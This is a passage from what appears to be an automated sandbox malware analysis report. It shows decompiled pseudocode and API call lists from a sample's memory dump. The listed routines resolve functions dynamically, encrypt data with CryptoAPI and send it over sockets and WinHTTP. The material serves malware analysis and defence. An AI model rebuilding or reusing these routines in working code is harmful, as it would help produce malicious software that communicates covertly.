													_t246 = _t246 + 1;
													_v16 = 0;
													if(_t246 < _v8) {
														continue;
													} else {
														goto L41;
													}
												} else {
													_t176 = _v16;
													_push( &_v20);
													_push(_t176);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t176 + 0x68))))() >= 0) {
														_t255 = E003C7B80(_v20, 0x3e330c,  &_v12, 2);
														_t263 = _t261 + 0x10;
														if(_t255 != 2) {
															__eflags = _t255;
															while(_t255 > 0) {
																_t123 = _t255 * 4; // 0x2080
																_t255 = _t255 - 1;
																E003CBB40( *((intOrPtr*)(_v12 + _t123 - 4)));
																_t263 = _t263 + 4;
																__eflags = _t255;
															}
															E003CBB40(_v12);
															_t261 = _t263 + 4;
														} else {
															_t52 = _v12 + 4; // 0x8bfc458b
															_t183 =  *_t52;
															_t257 = _v48 + _a4;
															__imp___wtoi(_t183);
															 *((intOrPtr*)(_t257 + _v56)) = _t183;
															 *_t257 = E003C66C0( *_v12);
															_t264 = _t263 + 8;
															_t258 = 8;
															do {
																_t242 =  *((intOrPtr*)(_t258 + _v12 - 4));
																_t258 = _t258 - 4;
																E003CBB40(_t242);
																_t264 = _t264 + 4;
															} while (_t258 > 0);
															E003CBB40(_v12);
															_t261 = _t264 + 4;
															_t259 = 0;
															do {
																_t189 = rand();
																asm("cdq");
																_t243 = _t189 % _v8;
																_t191 = 0;
																if(_t246 > 0) {
																	while( *((intOrPtr*)(_t194 + _t191 * 4)) != _t243) {
																		_t191 = _t191 + 1;
																		if(_t191 < _t246) {
																			continue;
																		}
																		goto L23;
																	}
																}
																L23:
																if(_t191 == _t246) {
																	 *_a4 = _t243;
																} else {
																	goto L24;
																}
																L27:
																if(_t259 == 0x400) {
																	_t220 = _t243 + 1;
																	while(_t220 != _t243) {
																		if(_t220 == _v8) {
																			_t220 = 0;
																		}
																		_t192 = 0;
																		if(_t246 > 0) {
																			while( *((intOrPtr*)(_t194 + _t192 * 4)) != _t220) {
																				_t192 = _t192 + 1;
																				if(_t192 < _t246) {
																					continue;
																				}
																				goto L36;
																			}
																		}
																		L36:
																		if(_t192 == _t246) {
																			 *_a4 = _t220;
																		} else {
																			goto L37;
																		}
																		goto L40;
																		L37:
																		_t220 = _t220 + 1;
																	}
																}
																goto L40;
																L24:
																_t259 = _t259 + 1;
															} while (_t259 < 0x400);
															goto L27;
														}
													}
												}
											}
											goto L48;
										}
									}
									L48:
									_t246 = 0;
								}
								E003CBB40(_v44);
								_t261 = _t261 + 4;
							}
							_t145 = _v32;
							if(_v32 != _t246) {
								E003CBB40(_t145);
								_t261 = _t261 + 4;
							}
							if(_t194 != _t246) {
								E003CBB40(_t194);
							}
						}
					}
				}
				_t128 = _v24;
				if(_t128 != _t246) {
					__imp__#6(_t128);
				}
				_t129 = _v20;
				if(_t129 != _t246) {
					__imp__#6(_t129);
				}
				_t130 = _v16;
				if(_t130 != _t246) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 8))))(_t130);
				}
				_t131 = _v28;
				if(_t131 != _t246) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))(_t131);
				}
				return _v36;
			}























































    0x003cbf6a
    0x003cbf73
    0x003cbf75
    0x003cbf7b
    0x003cbf7c
    0x003cbf7d
    0x003cbf80
    0x003cbf83
    0x003cbf86
    0x003cbf89
    0x003cbf8c
    0x003cbf8f
    0x003cbf92
    0x003cbf99
    0x003cbfb2
    0x003cbfb3
    0x003cbfb8
    0x003cbfbe
    0x003cbfc6
    0x003cbfc7
    0x003cbfcf
    0x003cbfe7
    0x003cbff5
    0x003cc000
    0x003cc00c
    0x003cc011
    0x003cc014
    0x003cc018
    0x003cc01e
    0x003cc023
    0x003cc02c
    0x003cc1ea
    0x003cc1ea
    0x003cc1ed
    0x003cc1f2
    0x003cc1f5
    0x003cc1fa
    0x003cc1fa
    0x003cc1fd
    0x003cc202
    0x003cc205
    0x003cc20a
    0x003cc20a
    0x003cc222
    0x003cc22f
    0x003cc234
    0x003cc237
    0x003cc23a
    0x003cc23d
    0x003cc241
    0x003cc243
    0x003cc252
    0x003cc25e
    0x003cc261
    0x003cc264
    0x003cc265
    0x003cc243
    0x003cc269
    0x003cc26c
    0x003cc273
    0x003cc032
    0x003cc034
    0x003cc03b
    0x003cc03e
    0x003cc041
    0x003cc041
    0x003cc046
    0x003cc049
    0x003cc049
    0x003cc04f
    0x003cc052
    0x003cc05b
    0x003cc05e
    0x003cc05e
    0x003cc064
    0x003cc06a
    0x003cc06b
    0x003cc074
    0x003cc075
    0x003cc07d
    0x00000000
    0x00000000
    0x003cc083
    0x003cc093
    0x003cc095
    0x003cc097
    0x003cc0a6
    0x003cc0ae
    0x003cc0b4
    0x003cc0bd
    0x003cc0c4
    0x003cc0c9
    0x003cc1ca
    0x003cc1ca
    0x003cc1d3
    0x003cc1d5
    0x003cc1d9
    0x003cc1da
    0x003cc1e4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cc0cf
    0x003cc0cf
    0x003cc0d7
    0x003cc0d8
    0x003cc0e0
    0x003cc0fa
    0x003cc0fc
    0x003cc102
    0x003cc2eb
    0x003cc2ed
    0x003cc2f3
    0x003cc2f7
    0x003cc2f9
    0x003cc2fe
    0x003cc301
    0x003cc301
    0x003cc309
    0x003cc30e
    0x003cc108
    0x003cc10b
    0x003cc10b
    0x003cc111
    0x003cc115
    0x003cc11e
    0x003cc12c
    0x003cc12e
    0x003cc131
    0x003cc136
    0x003cc139
    0x003cc13d
    0x003cc141
    0x003cc146
    0x003cc149
    0x003cc151
    0x003cc156
    0x003cc159
    0x003cc160
    0x003cc160
    0x003cc166
    0x003cc167
    0x003cc16a
    0x003cc16e
    0x003cc170
    0x003cc175
    0x003cc178
    0x00000000
    0x00000000
    0x00000000
    0x003cc178
    0x003cc170
    0x003cc17a
    0x003cc17c
    0x003cc18c
    0x00000000
    0x00000000
    0x00000000
    0x003cc18e
    0x003cc194
    0x003cc196
    0x003cc19b
    0x003cc1a3
    0x003cc1a5
    0x003cc1a5
    0x003cc1a7
    0x003cc1ab
    0x003cc1b0
    0x003cc1b5
    0x003cc1b8
    0x00000000
    0x00000000
    0x00000000
    0x003cc1b8
    0x003cc1b0
    0x003cc1ba
    0x003cc1bc
    0x003cc1c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cc1be
    0x003cc1be
    0x003cc1bf
    0x003cc19b
    0x00000000
    0x003cc17e
    0x003cc17e
    0x003cc17f
    0x00000000
    0x003cc187
    0x003cc102
    0x003cc0e0
    0x003cc0c9
    0x00000000
    0x003cc097
    0x003cc041
    0x003cc27a
    0x003cc27a
    0x003cc27a
    0x003cc280
    0x003cc285
    0x003cc285
    0x003cc288
    0x003cc28d
    0x003cc290
    0x003cc295
    0x003cc295
    0x003cc29a
    0x003cc29d
    0x003cc2a2
    0x003cc2a5
    0x003cbfcf
    0x003cbfb8
    0x003cc2a6
    0x003cc2ab
    0x003cc2ae
    0x003cc2ae
    0x003cc2b4
    0x003cc2b9
    0x003cc2bc
    0x003cc2bc
    0x003cc2c2
    0x003cc2c7
    0x003cc2cf
    0x003cc2cf
    0x003cc2d1
    0x003cc2d8
    0x003cc2e0
    0x003cc2e0
    0x003cc2e8

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003CC049
    • SysFreeString.OLEAUT32(?), ref: 003CC05E
    • _wtoi.MSVCRT ref: 003CC115
    • rand.MSVCRT ref: 003CC160
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • SysFreeString.OLEAUT32(?), ref: 003CC2AE
    • SysFreeString.OLEAUT32(?), ref: 003CC2BC
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DEB87, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 83
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C44B0, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 310
    C-Code - Quality: 91%
    			E003C44B0(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				char _v28;
				signed int _v32;
				char _v1056;
				void* __ebx;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t104;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr _t124;
				intOrPtr _t132;
				signed int* _t133;
				unsigned int _t135;
				void* _t138;
				void* _t142;
				intOrPtr _t148;
				void* _t150;
				intOrPtr* _t151;
				intOrPtr _t152;
				intOrPtr _t159;
				signed int _t163;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed short* _t174;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t186;
				signed int _t194;
				void* _t205;
				signed int _t206;
				void* _t208;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				intOrPtr* _t214;
				intOrPtr* _t215;
				void* _t216;
				void* _t217;
				void* _t220;

				_t210 = __esi;
				_t205 = __edi;
				E003C5000( &_v28);
				_t90 =  *0x3e8628; // 0x622508
				_v16 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0xac))))(0x3e8594, _t150);
				_t92 =  *0x3e8628; // 0x622508
				_t181 =  *0x3e857c; // 0x0
				_v12 = _t181;
				 *((intOrPtr*)( *((intOrPtr*)(_t92 + 0xc4))))(0x3e8594);
				_t182 =  *0x3e8584; // 0x0
				_t151 = _a4;
				if(_t182 == 0) {
					_t223 =  *((intOrPtr*)(_t151 + 4)) - _t182;
					if( *((intOrPtr*)(_t151 + 4)) != _t182) {
						E003C9090(_t223,  &_v1056, 0xb);
						_t148 =  *0x3e8628; // 0x622508
						_t216 = _t216 + 8;
						_push( &_v1056);
						_push( *((intOrPtr*)(_t151 + 4)));
						if( *((intOrPtr*)( *((intOrPtr*)(_t148 + 0xe0))))() == 0) {
							 *0x3e8584 = 1;
						}
					}
				}
				_push(_t210);
				_push(_t205);
				if( *((intOrPtr*)(_t151 + 0x10)) != 0) {
					_t135 =  *(_t151 + 0x14);
					if(_t135 >= 0x100000) {
						_v8 = (_t135 >> 4) + _t135 + 0x4c;
						_t215 = E003D1D90((_t135 >> 4) + _t135 + 0x4c, 0);
						_t138 = E003D1D90(0x10000, 0);
						_t209 = _t138;
						_t216 = _t216 + 0x10;
						if(_t138 != 0 && _t215 != 0) {
							_push(4);
							E003C5970(_t138, 0x1040, 2, 4, 4, 4, 4, 4, 4, 4);
							_v8 = _v8 - 8;
							_t22 = _t215 + 8; // 0x8
							_t142 = E003C7600(_t22,  *((intOrPtr*)(_t151 + 0x10)),  *(_t151 + 0x14), _t22,  &_v8, _t209);
							_t220 = _t216 + 0x3c;
							if(_t142 == 0) {
								 *_t215 = 0x4150495a;
								 *(_t215 + 4) =  *(_t151 + 0x14);
								 *((intOrPtr*)(_t151 + 0x10)) = _t215;
								_t215 =  *((intOrPtr*)(_t151 + 0x10));
								 *(_t151 + 0x14) = _v8 + 8;
							}
							E003CBB40(_t215);
							E003CBB40(_t209);
							_t216 = _t220 + 8;
						}
					}
				}
				do {
					_t94 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xac))))(0x3e8594);
					if(_v12 < 0) {
						L23:
						_v12 = 0xffffffff;
						L24:
						_t96 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0xc4))))(0x3e8594);
						_t50 =  &_v12;
						 *_t50 = _v12 + 1;
						if( *_t50 == 0) {
							_t211 = _v8;
							goto L47;
						}
						_t206 = _v32;
						_t211 = 0;
						do {
							_t114 = E003E1280(0,  &_v1056);
							_t217 = _t216 + 4;
							_push(0x1c);
							if(_t114 == 0) {
								L003CA47E();
								_t216 = _t217 + 4;
								__eflags = _t114;
								if(_t114 == 0) {
									L31:
									_t115 = 0;
									__eflags = 0;
									L32:
									_v20 = _t115;
									_push(_t206);
									_push( &_v1056);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))() != 0) {
										_v8 = _t211;
										__eflags = _t211 - 5;
										if(__eflags >= 0) {
											L42:
											_t163 = _v16 + 1;
											_v16 = _t163;
											if(_t163 > 0x4b0) {
												goto L48;
											}
											if(_t163 != (0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2) + ((0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2)) * 4 + (0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2) + ((0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2)) * 4) {
												_t124 =  *0x3e8628; // 0x622508
												 *((intOrPtr*)( *((intOrPtr*)(_t124 + 0xc8))))(0x3e8);
											} else {
												_t166 =  *0x3e8628; // 0x622508
												 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0xc8))))(0xea60);
											}
											goto L47;
										}
										_t213 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E003C90F0(_t151,  *((intOrPtr*)(_t151 + 0x18)), _t206, _t213,  &_v28,  *_t151,  *((intOrPtr*)(_t151 + 4)),  *((intOrPtr*)(_t151 + 8)),  *((intOrPtr*)(_t151 + 0xc)),  *((intOrPtr*)(_t151 + 0x10)),  *(_t151 + 0x14));
											if(__eflags != 0) {
												break;
											}
											_t170 =  *0x3e8628; // 0x622508
											 *((intOrPtr*)( *((intOrPtr*)(_t170 + 0xc8))))(0x3e8);
											_t213 = _t213 + 1;
											__eflags = _t213 - 3;
											if(__eflags < 0) {
												continue;
											}
											_v8 = _t213;
											L41:
											_t211 = _v8;
											goto L42;
										}
										_v8 = 0;
										goto L41;
									}
									goto L33;
								}
								_t115 = E003E1D30(_t114);
								goto L32;
							}
							L003CA47E();
							_t216 = _t217 + 4;
							if(_t114 == 0) {
								goto L31;
							}
							_t115 = L003E1DC0(_t114);
							goto L32;
							L33:
							_t211 = _t211 + 1;
						} while (_t211 < 5);
						_v8 = _t211;
						goto L42;
					}
					_t152 =  *((intOrPtr*)(_t151 + 0x18));
					_t132 =  *((intOrPtr*)(_t152 + 8));
					_t173 = _v12;
					if(_t173 >=  *((intOrPtr*)(_t132 + 0x18))) {
						L22:
						_t151 = _a4;
						goto L23;
					}
					_t174 =  *( *((intOrPtr*)(_t132 + 0x1c)) + _t173 * 4);
					_t214 = 0x200;
					_t133 =  &_v1056;
					_t208 = 0;
					while(1) {
						_t39 = _t214 + 0x7ffffdfe; // 0x7ffffffe
						if(_t39 == 0) {
							break;
						}
						_t194 =  *_t174 & 0x0000ffff;
						if(_t194 == 0) {
							break;
						}
						 *_t133 = _t194;
						_t133 =  &(_t133[0]);
						_t174 =  &(_t174[1]);
						_t214 = _t214 - 1;
						if(_t214 != 0) {
							continue;
						}
						L19:
						_t133 = _t133 - 2;
						_t208 = 0x8007007a;
						L20:
						 *_t133 = 0;
						if(_t208 < 0) {
							goto L22;
						}
						_t151 = _a4;
						_v32 =  *( *((intOrPtr*)( *((intOrPtr*)(_t152 + 8)) + 0x20)) + _v12 * 4) & 0x0000ffff;
						goto L24;
					}
					__eflags = _t214;
					if(__eflags != 0) {
						goto L20;
					}
					goto L19;
					L47:
				} while (_t211 > 0);
				L48:
				_t98 =  *_t151;
				if( *_t151 != 0) {
					E003CBB40(_t98);
					_t216 = _t216 + 4;
				}
				_t99 =  *((intOrPtr*)(_t151 + 4));
				if( *((intOrPtr*)(_t151 + 4)) != 0) {
					E003CBB40(_t99);
					_t216 = _t216 + 4;
				}
				_t100 =  *((intOrPtr*)(_t151 + 8));
				if( *((intOrPtr*)(_t151 + 8)) != 0) {
					E003CBB40(_t100);
					_t216 = _t216 + 4;
				}
				_t101 =  *((intOrPtr*)(_t151 + 0x10));
				if( *((intOrPtr*)(_t151 + 0x10)) != 0) {
					E003CBB40(_t101);
					_t216 = _t216 + 4;
				}
				_t102 =  *((intOrPtr*)(_t151 + 0xc));
				if( *((intOrPtr*)(_t151 + 0xc)) != 0) {
					E003CBB40(_t102);
					_t216 = _t216 + 4;
				}
				E003CBB40(_t151);
				_t104 = _v20;
				_v28 = 0x3e32ec;
				if(_t104 != 0) {
					_push(_t104);
					L003C1CB0();
				}
				_t186 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0xac))))(0x3e8600);
				_t159 =  *0x3e8628; // 0x622508
				 *0x3e8618 =  *0x3e8618 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t159 + 0xc4))))(0x3e8600);
				return 0;
			}

















































    0x003c44b0
    0x003c44b0
    0x003c44bd
    0x003c44c2
    0x003c44d2
    0x003c44d9
    0x003c44db
    0x003c44e0
    0x003c44f1
    0x003c44f4
    0x003c44f6
    0x003c44fc
    0x003c4501
    0x003c4503
    0x003c4506
    0x003c4511
    0x003c4519
    0x003c451e
    0x003c4527
    0x003c452e
    0x003c4533
    0x003c4535
    0x003c4535
    0x003c4533
    0x003c4506
    0x003c4543
    0x003c4544
    0x003c4545
    0x003c454b
    0x003c4553
    0x003c4565
    0x003c4574
    0x003c4576
    0x003c457b
    0x003c457d
    0x003c4582
    0x003c4588
    0x003c459f
    0x003c45a7
    0x003c45b3
    0x003c45b9
    0x003c45be
    0x003c45c3
    0x003c45c5
    0x003c45ce
    0x003c45da
    0x003c45dd
    0x003c45df
    0x003c45df
    0x003c45e3
    0x003c45e9
    0x003c45ee
    0x003c45ee
    0x003c4582
    0x003c4553
    0x003c4600
    0x003c4600
    0x003c4610
    0x003c4616
    0x003c468d
    0x003c468d
    0x003c4694
    0x003c4694
    0x003c46a4
    0x003c46a6
    0x003c46a6
    0x003c46a9
    0x003c47c3
    0x00000000
    0x003c47c3
    0x003c46af
    0x003c46b2
    0x003c46b4
    0x003c46bb
    0x003c46c0
    0x003c46c3
    0x003c46c7
    0x003c46de
    0x003c46e3
    0x003c46e6
    0x003c46e8
    0x003c46f3
    0x003c46f3
    0x003c46f3
    0x003c46f5
    0x003c46f5
    0x003c46fd
    0x003c4704
    0x003c470b
    0x003c4718
    0x003c471b
    0x003c471e
    0x003c4771
    0x003c4774
    0x003c4775
    0x003c477e
    0x00000000
    0x00000000
    0x003c4798
    0x003c47af
    0x003c47bf
    0x003c479a
    0x003c479a
    0x003c47ab
    0x003c47ab
    0x00000000
    0x003c4798
    0x003c4720
    0x003c4720
    0x003c4722
    0x003c4745
    0x003c4747
    0x00000000
    0x00000000
    0x003c4749
    0x003c475a
    0x003c475c
    0x003c475d
    0x003c4760
    0x00000000
    0x00000000
    0x003c4762
    0x003c476e
    0x003c476e
    0x00000000
    0x003c476e
    0x003c4767
    0x00000000
    0x003c4767
    0x00000000
    0x003c470b
    0x003c46ec
    0x00000000
    0x003c46ec
    0x003c46c9
    0x003c46ce
    0x003c46d3
    0x00000000
    0x00000000
    0x003c46d7
    0x00000000
    0x003c470d
    0x003c470d
    0x003c470e
    0x003c4713
    0x00000000
    0x003c4713
    0x003c4618
    0x003c461b
    0x003c461e
    0x003c4624
    0x003c468a
    0x003c468a
    0x00000000
    0x003c468a
    0x003c4629
    0x003c462c
    0x003c4631
    0x003c4637
    0x003c4640
    0x003c4640
    0x003c4648
    0x00000000
    0x00000000
    0x003c464a
    0x003c4650
    0x00000000
    0x00000000
    0x003c4652
    0x003c4655
    0x003c4658
    0x003c465b
    0x003c465c
    0x00000000
    0x00000000
    0x003c4664
    0x003c4664
    0x003c4667
    0x003c466c
    0x003c466e
    0x003c4673
    0x00000000
    0x00000000
    0x003c4682
    0x003c4685
    0x00000000
    0x003c4685
    0x003c4660
    0x003c4662
    0x00000000
    0x00000000
    0x00000000
    0x003c47c6
    0x003c47c6
    0x003c47ce
    0x003c47ce
    0x003c47d4
    0x003c47d7
    0x003c47dc
    0x003c47dc
    0x003c47df
    0x003c47e4
    0x003c47e7
    0x003c47ec
    0x003c47ec
    0x003c47ef
    0x003c47f4
    0x003c47f7
    0x003c47fc
    0x003c47fc
    0x003c47ff
    0x003c4804
    0x003c4807
    0x003c480c
    0x003c480c
    0x003c480f
    0x003c4814
    0x003c4817
    0x003c481c
    0x003c481c
    0x003c4820
    0x003c4825
    0x003c482b
    0x003c4835
    0x003c4837
    0x003c4838
    0x003c483d
    0x003c4840
    0x003c4851
    0x003c4853
    0x003c4859
    0x003c486a
    0x003c4871

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46DE
    • ??3@YAXPAX@Z.MSVCRT ref: 003C4838
      • Part of subcall function 003E1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1D73
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003C7600: memset.MSVCRT ref: 003C7698
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D5949, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124network
    C-Code - Quality: 26%
    			E003D5949(intOrPtr* __eax, void* __eflags, void* _a4, int _a8) {
				void* _v8;
				signed int* _v12;
				char _v32;
				void _v148;
				void* __esi;
				void* _t35;
				void* _t49;
				signed int _t50;
				intOrPtr* _t62;
				signed int _t64;
				void* _t74;
				signed int* _t78;

				_t62 = __eax;
				_t74 =  *0x3e8538(0x200);
				_v8 = _t74;
				_v12 =  *0x3e8538(0x200);
				_t35 = memset(_t74, 0, 0x200);
				_t3 =  &_a8; // 0x3d6045
				 *_t74 = 0x22;
				__imp__#9( *_t3);
				 *(_t74 + 9) = _t35;
				_t7 = _t74 + 0xb; // 0xb
				memcpy(_t7, _a4, _a8);
				 *0x3e899c(_t62 + 8, _t74, 0x1fd);
				_t64 = 0x1d;
				memcpy( &_v148, _t62 + 8, _t64 << 2);
				 *0x3e8ab0( &_v148,  &_v32);
				_t78 = _v12;
				 *((intOrPtr*)(_v8 + 5)) = _v32;
				if(E003D3BB7(_t62 + 0xf0, _v8, 0x1fd,  &(_t78[0]), _t62 + 0x110, _t62 + 0x120) == 0) {
					L6:
					 *0x3e8540(_v8);
					 *0x3e8540(_t78);
					_t49 = 0;
				} else {
					_t50 =  *(_t62 + 4) & 0x0000ffff;
					__imp__#9(_t50);
					 *_t78 = _t50;
					_t78[0] = 3;
					if(E003DFD0B( *_t62, _t78, 0x200) != 0x200 || E003DFB73( *_t62, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003D3BB7(_t62 + 0x100, _v8 + 3, 0x1fd, _t78, _t62 + 0x124, _t62 + 0x134) == 0 ||  *_t78 != 0x28) {
						goto L6;
					} else {
						 *0x3e8540(_v8);
						 *0x3e8540(_t78);
						_t49 = 1;
					}
				}
				return _t49;
			}















    0x003d595b
    0x003d5963
    0x003d5966
    0x003d5976
    0x003d5979
    0x003d5981
    0x003d5984
    0x003d5987
    0x003d5990
    0x003d5997
    0x003d599b
    0x003d59a9
    0x003d59b1
    0x003d59c6
    0x003d59c8
    0x003d59d4
    0x003d59d7
    0x003d5a03
    0x003d5a7c
    0x003d5a7f
    0x003d5a86
    0x003d5a8c
    0x003d5a05
    0x003d5a05
    0x003d5a0a
    0x003d5a16
    0x003d5a19
    0x003d5a2a
    0x00000000
    0x003d5a90
    0x003d5a93
    0x003d5a9a
    0x003d5aa2
    0x003d5aa2
    0x003d5a2a
    0x003d5aa9

    APIs
    • memset.MSVCRT ref: 003D5979
    • htons.WS2_32(E`=), ref: 003D5987
    • memcpy.MSVCRT ref: 003D599B
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D5A0A
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E04A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66
    C-Code - Quality: 94%
    			E003E04A0(void* __ecx, intOrPtr* _a4, signed int _a8) {
				void _v1022;
				short _v1024;
				char _v1028;
				char _v1540;
				char _v2052;
				long _t21;
				intOrPtr* _t22;
				intOrPtr _t34;
				intOrPtr* _t41;
				void* _t48;
				void* _t54;

				memset( &_v2052, 0, 0x800);
				_t21 = GetTempPathA(0x104,  &_v2052);
				_t41 = _a4;
				_t34 =  *_t41;
				 *((intOrPtr*)(_t54 + _t21 - 0x800)) = 0x61676571;
				_t22 =  &_v1540;
